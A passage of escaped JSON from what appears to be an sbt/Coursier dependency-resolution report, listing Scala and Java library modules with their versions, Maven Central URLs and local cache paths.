cts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"shaded-scalajson_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/mdedetrich/scalajson\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.inject\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.inject\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"collections_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"collections_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.plexus\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.plexus\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"launcher-interface\",\"revision\":\"1.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"launcher-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://scala-sbt.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.pantsbuild\",\"name\":\"jarjar\",\"revision\":\"1.7.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jarjar\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/pantsbuild/jarjar\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.trueaccord.scalapb\",\"name\":\"scalapb-runtime_2.12\",\"revision\":\"0.6.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalapb-runtime_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/scalapb/ScalaPB\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"compiler-interface\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"compiler-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-component-annotations\",\"revision\":\"1.5.5\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-component-annotations\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-control_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-control_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"test-agent\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"test-agent\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-classfile_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-classfile_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-apiinfo_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-apiinfo_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"completion_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"completion_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-classworlds\",\"revision\":\"2.5.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-classworlds\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-compile_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-compile_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"io.get-coursier\",\"name\":\"lm-coursier-shaded_2.12\",\"revision\":\"2.0.0-RC5-3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"lm-coursier-shaded_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/coursier/sbt-coursier\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"core-macros_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"core-macros_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"run_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"run_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.cb372\",\"name\":\"scalacache-core_2.12\",\"revision\":\"0.20.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalacache-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/cb372/scalacache\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-position_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-position_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-core_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.typesafe\",\"name\":\"config\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"config\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lightbend/config\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"librarymanagement-core_2.12\",\"revision\":\"1.3.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"librarymanagement-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/librarymanagement\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"sbinary_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbinary_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbinary\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okhttp3\",\"name\":\"okhttp-urlconnection\",\"revision\":\"3.7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okhttp-urlconnection\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\